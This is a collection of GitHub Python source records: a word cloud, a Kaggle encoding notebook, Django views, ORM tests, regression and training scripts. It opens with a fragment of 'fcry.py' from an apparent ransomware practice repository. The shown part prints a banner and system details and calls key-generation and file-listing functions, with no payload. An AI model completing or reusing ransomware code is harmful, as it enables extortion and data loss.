Fore.RESET)\n\tprint(Fore.GREEN + \"| ██╔══╝ ██║ ██╔══██╗ ╚██╔╝ |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| ██║ ╚██████╗██║ ██║ ██║ |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| ╚═╝ ╚═════╝╚═╝ ╚═╝ ╚═╝ |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"+--------------------------------------------+\" + Fore.RESET)\n\n\tusuario = getuser()\n\tsistema = platform\n\n\tprint(Fore.CYAN + \"INFORMACIÓN GENERAL DEL SISTEMA\" + Fore.RESET + \"\\n\")\n\tprint(Back.GREEN + Fore.BLACK + \"Usuario:\" + Fore.RESET + Back.RESET + \" \" + Fore.GREEN + usuario + Fore.RESET + \"\\n\")\n\tprint(Back.YELLOW + Fore.BLACK + \"Sistema:\" + Fore.RESET + Back.RESET + \" \" + Fore.YELLOW + sistema + Fore.RESET + \"\\n\")\n\tgetListArch()\n\nif __name__ == '__main__':\n\tgenerarClave()\n\tind = \"= \"\n\ttry:\n\t\tfor l in 200:\n\t\t\tif ind == \"= \":\n\t\t\t\tind = \"== \"\n\t\t\telif ind == \"== \":\n\t\t\t\tind = \"===\"\n\t\t\telif ind == \"===\":\n\t\t\t\tind = \"====\"\n\t\t\telif ind == \"====\":\n\t\t\t\tind = \"=====\"\n\t\t\telse:\n\t\t\t\tind = \"= \"\n\t\t\tsleep(1)\n\t\t\tprint(Cursor.UP(1)+Cursor.FORWARD(2)+Fore.YELLOW + \"[ \" + ind + \" ]\" + \"Iniciando fcry.py\")\n\t\tif platform.startswith(\"win32\"):\n\t\t\tsystem(\"cls\")\n\t\telif platform.startswith(\"linux\"):\n\t\t\tsystem(\"clear\");\n\texcept:\n\t\tprint( Back.RED + \"Ocurrió un error!\" + Back.RESET)\n\tprint(\"\\n\")\n\tbanner()\n\tprint(\"\\n\")","repo_name":"Fernand117/RasomwarePractica","sub_path":"src/fcry.py","file_name":"fcry.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"17940334544","text":"import sqlite3\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\nfrom PIL import Image\nimport numpy as np\nimport jieba\nfrom collections import Counter\n\ndb = sqlite3.connect(\"nkustnews.db\")\ndata = list() #創造空串列,新資料可以Append進來\nsql = \"select title from news;\" #把所有標題(title)都列出來,要做文字雲\nrows = db.execute(sql)\nfor row in rows:\n data.append(row[0]) #新資料Append進data串列\ndata = \";\".join(data) #將串列資料用分號(;)連在一起,導入新的data,此時新data資料型態變為字串(str),取代舊的被遺棄的data(串列list)\n#先處裡字典,再處理停用詞\njieba.load_userdict(\"dict.txt\") #先載入字典,避免特定關鍵字被切開\nwith open('stopWords.txt', 'rt', encoding='utf-8') as fp:\n stopwords = [word.strip() for word in fp.readlines()] #將記事本的停用詞清理成串列\n#設置迴圈將字典用字進入停用詞檢查,不重複通過才送入keyterms\nkeyterms = [keyterm for keyterm in jieba.cut(data) \n if keyterm not in stopwords \n and keyterm.strip()!=\"\" \n and keyterm.strip()!=\",\"]\ntext = \",\".join(keyterms)\nmask = np.array(Image.open('cloud.jpg'))\nwordcloud = WordCloud(background_color=\"white\",\n width=1000, height=860, \n margin=2, font_path=\"simhei.ttf\", \n mask=mask).generate(text)\nplt.figure(figsize=(10,10))\nplt.imshow(wordcloud)\nplt.axis(\"off\")\nplt.show()\n\n# 細節說明\n# res = jieba.cut(data) #用jieba切開,切完是interate不能print\n# res = [w for w in res] #用一個迴圈定義才能print","repo_name":"OtanChou/nkust110-aiot-day03","sub_path":"test15.py","file_name":"test15.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"74947585407","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# For example, here's several helpful packages to load in \n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\nimport seaborn as sns\n\nimport matplotlib.pyplot as plt\n\nimport scipy as sp\n\nfrom scipy import stats\n\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.linear_model import LogisticRegression\n\nfrom sklearn.metrics import accuracy_score\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\n\n\nimport os\n\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n\n for filename in filenames:\n\n print(os.path.join(dirname, filename))\n\n\n\n# Any results you write to the current directory are saved as output.\n# load data ets in to note book\n\ndf_test = pd.read_csv('/kaggle/input/cat-in-the-dat/test.csv')\n\ndf_train = pd.read_csv('/kaggle/input/cat-in-the-dat/train.csv')\n\ndf_sub = pd.read_csv('/kaggle/input/cat-in-the-dat/sample_submission.csv')\n\nprint('test data set',df_test.shape)\n\nprint('train data set',df_train.shape)\n\ndf_sub.shape\npd.set_option('display.max_rows', 500)\n\npd.set_option('display.max_columns', 500)\n\npd.set_option('display.width', 1000)\n\ndf_train.head()\n# deep look into bin lables...\n\n\n\nbin_cols = ['bin_0', 'bin_1', 'bin_2', 'bin_3', 'bin_4']\n\n# loop to get column and the count of plots\n\nfor n, col in enumerate(df_train[bin_cols]): \n\n plt.figure(n)\n\n sns.countplot(x=col, data=df_train, hue='target', palette='husl')\n# let's converting the bin_3 and bin_4 into 0,1 \n\ndf_train['bin_3'] = df_train['bin_3'].replace(to_replace=['F', 'T'], value=['0', '1']).astype(int)\n\ndf_train['bin_4'] = df_train['bin_4'].replace(to_replace=['Y', 'N'], value=['1', '0']).astype(int)\n\n# test data set\n\ndf_test['bin_3'] = df_test['bin_3'].replace(to_replace=['F', 'T'], value=['0', '1']).astype(int)\n\ndf_test['bin_4'] = df_test['bin_4'].replace(to_replace=['Y', 'N'], value=['1', '0']).astype(int)\n# checking the data frame\n\ndf_train.head(2)\n#Drop ID and seperate target variable\n\ntarget = df_train['target']\n\ntrain_id = df_train['id']\n\ntest_id = df_test['id']\n\ndf_train.drop(['target', 'id'], axis=1, inplace=True)\n\ndf_test.drop('id', axis=1, inplace=True)\n\n\n\nprint(df_train.shape)\n\nprint(df_test.shape)\n# let's look at Nominal feartures..\n\nnom_cols = ['nom_0', 'nom_1', 'nom_2', 'nom_3', 'nom_4', 'nom_5', 'nom_6', 'nom_7', 'nom_8', 'nom_9']\n\nfrom sklearn import model_selection, preprocessing, metrics\n\nle = preprocessing.LabelEncoder()\n\ntraintest = pd.concat([df_train, df_test])\n\nfor i in nom_cols:\n\n print(\"The number of unique values in {} column is : {}\".format(i, df_train[i].nunique()) )\n\nfor col in nom_cols:\n\n traintest[col] = le.fit_transform(traintest[col])\n\n\n\ntrain_le = traintest.iloc[:df_train.shape[0], :]\n\ntest_le = traintest.iloc[df_train.shape[0]:, :]\n\n\n\nprint(train_le.shape)\n\nprint(test_le.shape)\ntrain_le.head()\n# nominal encoding with onehotencoder...\n\nfrom sklearn.preprocessing import OneHotEncoder\n\nOHE=OneHotEncoder()\n\ntrain_ohe1 = OHE.fit_transform(df_train)\n\ntest_ohe1 = OHE.fit_transform(df_test)\n\n\n\nprint(train_ohe1.shape)\n\nprint(train_ohe1.dtype)\n\nprint(test_ohe1.shape)\n\nprint(test_ohe1.dtype)\n# ordinal feature encoding technics...\n\nord_cols = ['ord_0', 'ord_1', 'ord_2', 'ord_3', 'ord_4', 'ord_5']\n\n\n\nfor i in ord_cols:\n\n print(\"The number of unique values in {} column is : {}\".format(i, df_train[i].nunique()) )\n\n print(\"The unique values in {} column is : \\n {}\".format(i, df_train[i].value_counts()[:5]))\n\n print('\\n')\nmapper_ord_1 = {'Novice': 1, 'Contributor': 2, 'Expert': 3, 'Master': 4, 'Grandmaster': 5}\n\n\n\nmapper_ord_2 = {'Freezing': 1, 'Cold': 2, 'Warm': 3, 'Hot': 4,'Boiling Hot': 5, 'Lava Hot': 6}\n\n\n\nmapper_ord_3 = {'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5, 'f': 6, 'g': 7, 'h': 8, \n\n 'i': 9, 'j': 10, 'k': 11, 'l': 12, 'm': 13, 'n': 14, 'o': 15}\n\n\n\nmapper_ord_4 = {'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5, 'F': 6, 'G': 7, 'H': 8, \n\n 'I': 9, 'J': 10, 'K': 11, 'L': 12, 'M': 13, 'N': 14, 'O': 15,\n\n 'P': 16, 'Q': 17, 'R': 18, 'S': 19, 'T': 20, 'U': 21, 'V': 22, \n\n 'W': 23, 'X': 24, 'Y': 25, 'Z': 26}\n\n\n\nfor col, mapper in zip(['ord_1', 'ord_2', 'ord_3', 'ord_4'], [mapper_ord_1, mapper_ord_2, mapper_ord_3, mapper_ord_4]):\n\n df_train[col+'_oe'] = df_train[col].replace(mapper)\n\n df_test[col+'_oe'] = df_test[col].replace(mapper)\n\n df_train.drop(col, axis=1, inplace=True)\n\n df_test.drop(col, axis=1, inplace=True)\n# ord_5, we have high cardinality\n\nfrom sklearn.preprocessing import OrdinalEncoder\n\nencoder = OrdinalEncoder(categories='auto')\n\nencoder.fit(df_train.ord_5.values.reshape(-1, 1))\n\ndf_train.ord_5 = encoder.transform(df_train.ord_5.values.reshape(-1, 1))\n\ndf_test.ord_5 = encoder.transform(df_test.ord_5.values.reshape(-1, 1))\ndf_train.ord_5[:5]\ndf_train[['ord_1_oe','ord_2_oe','ord_3_oe','ord_4_oe','ord_5','ord_0']].info()\ndef logistic(X,y):\n\n X_train,X_test,y_train,y_test=train_test_split(X,y,random_state=32,test_size=0.2)\n\n lr=LogisticRegression()\n\n lr.fit(X_train,y_train)\n\n y_pre=lr.predict(X_test)\n\n print('Accuracy : ',accuracy_score(y_test,y_pre))\nlogistic(train_ohe1,target)\n\n\nx_train_ohe,x_test_ohe,y_train_ohe,y_test_ohe=train_test_split(train_ohe1,target,random_state=42,test_size=0.2)\nlr=LogisticRegression()\n\nlr.fit(x_train,y_train)\n\ny_pre=lr.predict(x)\n\nprint('Accuracy : ',accuracy_score(y_test,y_pre))\ndf_sub['target'] = y_pre\n\ndf_sub.to_csv('lgb_model.csv', index=False)\n\nlen(df_sub)\ndf_sub.shape\ndf_sub['target'].shape","repo_name":"aorursy/new-nb-2","sub_path":"cserajendra_deep-drive-into-encoding-tech-s.py","file_name":"cserajendra_deep-drive-into-encoding-tech-s.py","file_ext":"py","file_size_in_byte":5808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"1998592925","text":"import os\nimport sys\n\nfrom arakhne.settings import Defaults\n\n\nclass BaseFile:\n filetype = 'base'\n settings = Defaults.FILES_ALL\n\n def __init__(self, corpus, settings=None):\n self.corpus = corpus\n if settings:\n self.settings.update(settings)\n\n def update(\n self,\n prefix_msg,\n counter,\n postscript_msg='',\n ):\n if not prefix_msg and not counter:\n sys.stdout.write('\\n')\n return True\n message = '\\r'\n message += str(prefix_msg) + \" \" + str(counter)\n message += \" \" + str(postscript_msg)\n sys.stdout.write(message)\n return True\n\n def mk_path(self, path):\n # Return built absolute path if relative path sent\n if self.settings['path_type'] == 'relative':\n return os.path.join(os.getcwd(), path)\n return path\n\n def exists(self, path):\n return os.path.exists(path)\n\n def test_load(self, path):\n if not self.exists(path):\n raise OSError('No file found at that location')\n\n def test_save(self, path):\n if self.exists(path) and not self.settings['overwrite']:\n raise OSError('File already exists and overwrite not specified')\n","repo_name":"thePortus/arakhne","sub_path":"arakhne/corpus/files/base_file.py","file_name":"base_file.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"43289522645","text":"# 다른 사람 풀이 1\nfrom collections import deque\ndef solution(people, limit):\n answer = 0\n deq = deque(sorted(people))\n while deq:\n if len(deq) == 1:\n answer += 1\n break\n if deq[0] + deq[-1] <= limit:\n deq.pop()\n deq.popleft()\n else:\n deq.pop()\n answer += 1\n return answer\n \n# 다른 사람 풀이 2\ndef solution(people, limit) :\n answer = 0\n people.sort()\n\n a = 0\n b = len(people) - 1\n while a < b :\n if people[b] + people[a] <= limit :\n a += 1\n answer += 1\n b -= 1\n return len(people) - answer\n","repo_name":"Juhyun22/Coding_Test","sub_path":"programmers/탐욕법/구명보트.py","file_name":"구명보트.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"24597947474","text":"from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponse, JsonResponse, response\nfrom .models import Problem, Solution\nfrom .serializers import ProblemSerializer, SolutionSerializer\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\n\n@api_view([\"GET\"])\ndef apiOverview(request):\n api_urls = {\n \"List problems\": \"/problem/list/\",\n \"View problem\": \"/problem/details//\",\n \"Create problem\": \"/problem/create/\",\n \"Update problem\": \"/problem/update//\",\n \"Delete problem\": \"/problem/delete//\",\n \"List solutions\": \"/solution/list//\",\n }\n\n return Response(api_urls)\n\n\n@api_view([\"GET\"])\ndef problemList(request):\n problems = Problem.objects.all()\n serializer = ProblemSerializer(problems, many=True)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef problemDetail(request, pk):\n problem = get_object_or_404(Problem, id=pk)\n serializer = ProblemSerializer(problem, many=False)\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef problemCreate(request):\n serializer = ProblemSerializer(data=request.data)\n print(serializer)\n print(serializer.is_valid())\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef problemUpdate(request, pk):\n problem = get_object_or_404(Problem, id=pk)\n serializer = ProblemSerializer(instance=problem, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n\n@api_view([\"DELETE\"])\ndef problemDelete(request, pk):\n problem = get_object_or_404(Problem, id=pk)\n problem.delete()\n return Response(\"Problem succsesfully deleted.\")\n\n\n@api_view([\"GET\"])\ndef solutionList(request, pk):\n problem = get_object_or_404(Problem, id=pk)\n solutions = problem.solution_set.all()\n serializer = SolutionSerializer(solutions, many=True)\n return Response(serializer.data)","repo_name":"andreikovacs03/Evaluator","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"12469339911","text":"# ex-080 - Lista ordenada sem Repetição.\n\nlista = []\nfor cont in range(5):\n n = int(input('Digite um número: '))\n if cont == 0 or n > lista[-1]: # Se cont for o primeiro 'ou' n for maior que o ultimo da lista:\n lista.append(n)\n else:\n pos = 0\n while pos < len(lista):\n if n <= lista[pos]:\n lista.insert(pos, n)\n break\n pos += 1\nprint(f'{\"Lista em Ordem\":-^20}')\nprint(f'{lista}')\n","repo_name":"Israel-covello/Python3-studies","sub_path":"pythonProject/Exercicios_3/ex-080.py","file_name":"ex-080.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"44215878026","text":"# -*- coding: utf-8 -*-\n# 16/7/11\n# create by: snower\n\nimport datetime\nfrom tornado.testing import gen_test\nfrom . import BaseTestCase\nfrom .model import Test\n\nclass TestQueryTestCase(BaseTestCase):\n @gen_test\n async def test(self):\n await Test.delete()\n\n await Test.create(id=1, data=\"test\", created_at=datetime.datetime.now(), updated_at=datetime.datetime.now())\n await Test.create(id=2, data=\"test\", created_at=datetime.datetime.now(), updated_at=datetime.datetime.now())\n\n c = await Test.select().count()\n assert c == 2, ''\n\n data = [i for i in (await Test.select())]\n assert len(data) == 2, ''\n\n data = []\n async for i in Test.select():\n data.append(i)\n assert len(data) == 2, ''\n\n data = [i for i in (await Test.select().where(Test.id>0))]\n assert len(data) == 2, ''\n\n data = [i for i in (await Test.select(Test.data).group_by(Test.data))]\n assert len(data) == 1, ''\n\n data = [i for i in (await Test.select().limit(1))]\n assert len(data) == 1, ''\n\n data = [i for i in (await Test.select().order_by(Test.id.desc()))]\n assert data[0].id == 2\n\n t = await Test.select().order_by(Test.id.desc()).first()\n t.data = \"aaa\"\n await t.save()\n t = await Test.select().order_by(Test.id.desc()).first()\n assert t.data == 'aaa'\n\n t = await Test.select().order_by(Test.id.desc()).first()\n await t.delete_instance()\n t = await Test.select().where(Test.id == t.id).first()\n assert t is None\n\n await Test.update(data = '12345')\n t = await Test.select().order_by(Test.id.desc()).first()\n assert t.data == '12345', ''\n\n await Test.delete()\n c = await Test.select().count()\n assert c == 0, ''","repo_name":"snower/torpeewee","sub_path":"tests/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"42"} +{"seq_id":"4995107786","text":"# v2020.03.19v2\n# created by yifan\n\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom numpy import inf\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\n\nclass LLSR():\n def __init__(self, onehot=True, normalize=False):\n self.onehot = onehot\n self.normalize = normalize\n self.coeff = []\n self.weight = []\n self.trained = False\n\n # weighted least square\n def fit(self, X, Y):\n if self.onehot == True:\n y = np.zeros((X.shape[0], np.unique(Y).shape[0]))\n y[np.arange(Y.size), Y] = 1\n Y = y.copy()\n\n\n\n bin_edge = np.linspace(-1, 1, 21, endpoint=True)\n counts, _ = np.histogram(Y, bins=bin_edge)\n\n freq = counts/Y.shape[0]\n\n idx = np.zeros((len(counts)+1), dtype=int) # 21\n for i in range(len(counts)+1):\n idx[i] = np.sum(counts[:i])\n\n W = np.zeros((Y.shape[0]))\n for i in range(len(idx)-1):\n for j in range(idx[i], idx[i+1]):\n W[j] = 1/max(freq[i], 0.001)\n\n\n # X_pos = X[Y>0]\n # X_neg = X[Y<0]\n # Y_pos = Y[Y>0]\n # Y_neg = Y[Y<0]\n #\n # X_reorder = np.concatenate((X_pos, X_neg), axis=0)\n # Y_reorder = np.concatenate((Y_pos, Y_neg), axis=0)\n #\n # km_p = KMeans(n_clusters=10).fit(Y_pos.reshape(Y_pos.shape[0], 1))\n # km_n = KMeans(n_clusters=10).fit(Y_neg.reshape(Y_neg.shape[0], 1))\n #\n # freq_p = np.zeros((10))\n # freq_n = np.zeros((10))\n #\n # pos_clus_labels = km_p.labels_\n # neg_clus_labels = km_n.labels_\n #\n # for i in range(10):\n # freq_p[i] = len(Y_pos[pos_clus_labels == i]) / len(Y_pos)\n # freq_n[i] = len(Y_neg[neg_clus_labels == i]) / len(Y_neg)\n #\n # W = np.zeros((Y.shape[0]))\n #\n # for i in range(Y_pos.shape[0]):\n # label = km_p.predict(Y_pos[i].reshape(1, 1))\n # W[i] = 1/(freq_p[label] + 0.001)\n # for j in range(Y_neg.shape[0]):\n # label = km_n.predict(Y_neg[j].reshape(1, 1))\n # W[Y_pos.shape[0] + j] = 1/(freq_n[label] + 0.001)\n\n\n\n\n\n\n # W = np.ones((Y.shape[0]))\n\n self.weight = W\n\n WX = np.zeros((X.shape))\n WY = np.zeros((Y.shape))\n for i in range(X.shape[0]):\n WX[i] = W[i] * np.array(X[i])\n WY[i] = W[i] * np.array(Y[i])\n\n # if Y.shape[0] == 986864:\n # plt.figure()\n # edge = np.linspace(np.min(WY), np.max(WY), 41, endpoint=True)\n # n_p, bins_p, patches_p = plt.hist(x=WY, bins=edge, color='b', rwidth=0.9, density=True, label=\"spliced pixels\")\n #\n # plt.grid(axis='y')\n # plt.xlabel('Value')\n # plt.ylabel('Frequency')\n # plt.title('histogram of weighted training Y')\n # # plt.legend()\n # plt.savefig('/mnt/yaozhu/image_splicing_mnt/Output_Mat_Files/regression_v1/channelwisepca/multi_resolution/features/' + \"1-2_resolution/ssl/histogram_1-2_lab_weighted_train_Y.png\")\n\n A = np.ones((WX.shape[0], 1))\n WX = np.concatenate((A, WX), axis=1)\n\n\n self.coeff = np.matmul(np.linalg.pinv(WX), WY)\n self.trained = True\n\n return self\n\n # def predict(self, X):\n # assert (self.trained == True), \"Must call fit first!\"\n # X = self.predict_proba(X)\n # return np.argmax(X, axis=1)\n\n def predict_proba(self, X):\n assert (self.trained == True), \"Must call fit first!\"\n A = np.ones((X.shape[0], 1))\n X = np.concatenate((A, X), axis=1)\n pred = np.matmul(X, self.coeff)\n if self.normalize == True:\n pred = (pred - np.min(pred, axis=1, keepdims=True)) / np.sum(\n (pred - np.min(pred, axis=1, keepdims=True) + 1e-15), axis=1, keepdims=True)\n return pred\n\n # def score(self, X, Y):\n # assert (self.trained == True), \"Must call fit first!\"\n # pred = self.predict(X)\n # return accuracy_score(Y, pred)\n\n def mse(self, X, Y):\n assert (self.trained == True), \"Must call fit first\"\n pred = self.predict_proba(X)\n return mean_squared_error(Y, pred, sample_weight=self.weight)\n\n\n\n\nif __name__ == \"__main__\":\n from sklearn import datasets\n from sklearn.model_selection import train_test_split\n\n print(\" > This is a test example: \")\n digits = datasets.load_digits()\n X = digits.images.reshape((len(digits.images), -1))\n print(\" input feature shape: %s\" % str(X.shape))\n X_train, X_test, y_train, y_test = train_test_split(X, digits.target, test_size=0.2, stratify=digits.target)\n\n clf = LLSR(onehot=True, normalize=True)\n clf.fit(X_train, y_train)\n print(\" --> train acc: %s\" % str(clf.score(X_train, y_train)))\n print(\" --> test acc: %s\" % str(clf.score(X_test, y_test)))\n print(\"------- DONE -------\\n\")","repo_name":"ZhengWenSEC2023/Image-Steganalysis","sub_path":"previous_trial/LLSR_yifan.py","file_name":"LLSR_yifan.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"12379413215","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import timedelta\n\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import ValidationError\n\n\nclass SpaceSchedule(models.TransientModel):\n _name = 'space.schedule.statistics'\n _description = 'Auxiliary model to get schedule statistics.'\n\n start_datetime = fields.Datetime(\n default=fields.Datetime.now(),\n required=True,\n )\n stop_datetime = fields.Datetime(\n default=fields.Datetime.now(),\n required=True,\n )\n space_id = fields.Many2one(\n comodel_name='space',\n )\n schedule_ids = fields.Many2many(\n comodel_name=\"space.schedule\",\n readonly=True,\n )\n\n def get_lines(self):\n SpaceSchedule = self.env['space.schedule']\n filter = [\n ('start_datetime', '>=', self.start_datetime),\n ('stop_datetime', '<=', self.stop_datetime),\n ]\n if self.space_id:\n filter.append(\n ('space_id', '=', self.space_id.id)\n )\n self.schedule_ids = SpaceSchedule.search(filter)\n return {\n 'context': self.env.context,\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': self._name,\n 'res_id': self.id,\n 'view_id': False,\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n }\n","repo_name":"jlira-estrasol/lunaria","sub_path":"addons/space_control/models/space_schedule_statistics.py","file_name":"space_schedule_statistics.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"25405135771","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Author: lihuiru\n# Created on 2023/11/18 20:29\nfrom collections import Counter\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom joblib import dump\n\n# Import the latest feature ranking list based on RFE\ndata = pd.read_csv('../data/max_AUC.csv')\nmu = data.loc[:, 'features'].str.cat(sep=',')\nlst = mu.split(',')\nlst = [i.strip() for i in lst]\n\n# Sort features based on their occurrence frequency in descending order\nkeys_sorted = sorted(Counter(lst).keys(), key=Counter(lst).get, reverse=True)\n\n# Load your data\ndf = pd.read_csv('../data/mutation_matrix2.0.csv')\n\n# Drop rows with any NaN values\ndf = df.dropna()\n\n# Map string labels to integers\ndf.iloc[:, -1] = df.iloc[:, -1].map({'Virulent': 0, 'Avirulent': 1})\n\n# Ensure the labels are integers\ndf.iloc[:, -1] = df.iloc[:, -1].astype(int)\n\n# Separate features and labels\nX = df.iloc[:, 1:-1]\ny = df.iloc[:, -1]\n\n# The number representing the top N features selected during cross-validation\nnum = 11\n\n# Initialize a DataFrame to store results\nresults = pd.DataFrame(columns=['Seed', 'Accuracy', 'Precision', 'Recall', 'F1 Score', 'AUC'])\nseed = 42 # Random seed for reproducibility\n\n# Split data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=seed)\n\n# Select Top-N features\nX_train_selected = X_train[keys_sorted[:num]]\nX_test_selected = X_test[keys_sorted[:num]]\n\n# Initialize and train the model\nmodel = RandomForestClassifier(random_state=seed)\nmodel.fit(X_train_selected, y_train)\n\n# Predict and evaluate\ny_pred = model.predict(X_test_selected)\ny_pred_proba = model.predict_proba(X_test_selected)[:, 1]\n\n# Save the trained RandomForest model to disk\ndump(model, '../model/random_forest_model.joblib')\n\n# # Save the top N features used for training the model\n# dump(keys_sorted[:num], 'model/top_features.joblib')\n","repo_name":"lihuirull/FluVirulencePredictor","sub_path":"fluvp/train_new_model.py","file_name":"train_new_model.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"17384879216","text":"# -*- coding: utf-8 -*-\nimport re;\nimport urllib3\nimport urllib\nfrom urllib.parse import quote\nimport string\n\nurl_format = 'https://baike.baidu.com/item/'\n\nitem_name = '阿尔伯特·爱因斯坦'\n\nurl = url_format + item_name\n\nurl = quote(url,safe=string.printable)\n\nhttp = urllib3.PoolManager()\nr = http.request('GET', url)\nf = open( item_name + '.baike.html', 'wb+')\nf.write(r.data)\nf.close()\n\n\nhtml = (r.data).decode('utf-8');\nbaidu_cache_urls = re.findall(r'(https://.+?)/.*', html)\nprint(baidu_cache_urls)","repo_name":"Gavin12c/python","sub_path":"spider-course-4-master/baidu/baike.py","file_name":"baike.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"30003577790","text":"import os\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nimport argparse\nimport time\nimport datetime\nimport sys\nimport math\nimport scipy.io as scio\nimport numpy as np\nfrom skimage import io\n\nimport random\n\nfrom DWonder.SEG.data_process import train_preprocess_lessMemory_seg, shuffle_datasets_lessMemory\nfrom DWonder.SEG.network import SEG_Network_3D_Unet\nfrom DWonder.SEG.utils import FFDrealign4, inv_FFDrealign4\n#############################################################################################################################################\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--epoch\", type=int, default=0, help=\"epoch to start training from\")\nparser.add_argument(\"--n_epochs\", type=int, default=100, help=\"number of training epochs\")\nparser.add_argument('--GPU', type=int, default=3, help=\"the index of GPU you will use for computation\")\nparser.add_argument('--cuda', action='store_true', help='use GPU computation')\nparser.add_argument('--output_dir', type=str, default='results', help=\"the output folder\")\n\nparser.add_argument('--img_w', type=int, default=512, help=\"\")\nparser.add_argument('--img_h', type=int, default=512, help=\"\")\nparser.add_argument('--input_nc', type=int, default=1, help=\"\")\nparser.add_argument('--output_nc', type=int, default=1, help=\"\")\nparser.add_argument('--f_maps', type=int, default=1, help=\"\")\nparser.add_argument('--frame_num', type=int, default=1, help=\"\")\n\nparser.add_argument('--lr', type=float, default=0.0001, help='initial learning rate')\nparser.add_argument(\"--b1\", type=float, default=0.5, help=\"adam: decay of first order momentum of gradient\")\nparser.add_argument(\"--b2\", type=float, default=0.999, help=\"adam: decay of first order momentum of gradient\")\nparser.add_argument('--normalize_factor', type=int, default=10000, help='actions: train or predict')\n\nparser.add_argument('--datasets_folder', type=str, default='rawdata', help=\"the name of your project\")\nparser.add_argument('--datasets_path', type=str, default='datasets', help=\"the name of your project\")\nparser.add_argument('--input_folder', type=str, default='image', help=\"\")\nparser.add_argument('--GT_folder', type=str, default='mask', help=\"\")\nparser.add_argument('--pth_path', type=str, default='SEG_pth', help=\"the name of your project\")\nparser.add_argument('--train_datasets_size', type=int, default=1000, help='actions: train or predict')\n\nopt = parser.parse_args()\nprint('the parameter of your training ----->')\nprint(opt)\n########################################################################################################################\nif not os.path.exists(opt.output_dir): \n os.mkdir(opt.output_dir)\ncurrent_time = 'TS3DUnetFFD_'+opt.datasets_path+'_'+opt.datasets_folder \\\n +'_ic'+str(opt.input_nc)+'_oc'+str(opt.output_nc)+'_lr'+str(opt.lr)+'_fm'+str(opt.f_maps)+'_'+datetime.datetime.now().strftime(\"%Y%m%d-%H%M\")\n\noutput_path = opt.output_dir + '//' + current_time\npth_folder = opt.pth_path+'//'+ current_time\n\nprint('output_path ---> ',output_path)\nprint('pth_folder ---> ',pth_folder)\n\nif not os.path.exists(opt.output_dir): \n os.mkdir(opt.output_dir)\nif not os.path.exists(output_path): \n os.mkdir(output_path)\nif not os.path.exists(opt.pth_path): \n os.mkdir(opt.pth_path)\nif not os.path.exists(pth_folder): \n os.mkdir(pth_folder)\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = str(opt.GPU)\nlr = opt.lr\n\ncoor_list, GT_list, input_list = train_preprocess_lessMemory_seg(opt)\n\nnet_seg = SEG_Network_3D_Unet(UNet_type= 'TS_UNet3D',\n in_channels = 4,\n out_channels = 4,\n frame_num = opt.frame_num,\n final_sigmoid = True,\n f_maps = 